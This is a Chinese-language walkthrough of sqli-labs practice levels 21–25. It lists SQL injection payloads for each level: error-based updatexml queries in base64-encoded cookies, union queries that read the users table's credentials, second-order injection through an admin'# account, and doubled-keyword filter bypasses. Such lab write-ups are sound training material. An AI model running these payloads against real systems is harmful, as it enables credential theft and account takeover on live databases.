sqli-labs-master靶场第二十一关
一,页面输入admin 147258 登录
可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。
我们解一下码查看一下bse64编码
二,Burp Suite 抓包,并且把抓到的数据发送到重放器上
三,采用报错注⼊函数获取其当前数据库名称
')and updatexml(1,concat(1,database()),1)#编码
四,查表名
')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码
五,查列名
')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码
六,查看users表中所有信息
')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码
sqli-labs-master靶场第二十二关
一,页面输入admin 147258 登录
可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。
二,Burp Suite 抓包,并且把抓到的数据发送到重放器上
三,采用报错注⼊函数获取其当前数据库名称
"and updatexml(1,concat(1,database()),1)#编码
四,查表名
"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#编码
五,查列名
"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #编码
六,查看users表中所有信息
"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#编码
sqli-labs-master靶场第二十三关
一,测试闭合方式
输入单引号报错,但是注释符不管用。猜测注释符被过滤,查看源码果然被注释了,所以我们可以用单引号闭合,发现成功。
?id=1' or '1'='1
二,查看数据库
?id=-1' union select 1,database(),3 or '1'='1
三,查看表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1'='1
四,查列名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' or '1'='1
sqli-labs-master靶场第二十四关
二次注入:
一,点击" New User click Here "并注册用户名为 admin'#
二,对注册的账号 admin'# 进⾏登录并修改密码
三,打开数据库查看发现,admin'#密码并没有被改,admin密码被改了
sqli-labs-master靶场第二十五关
页面提示是将or和and这两个替换成空,可以采取双写绕过
一,查看表名
information里面涉及or可以写成infoorrmation
?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+
二,查看列
information里面涉及or可以写成infoorrmation
and改为anandd
?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_schema='security' anandd table_name='users'--+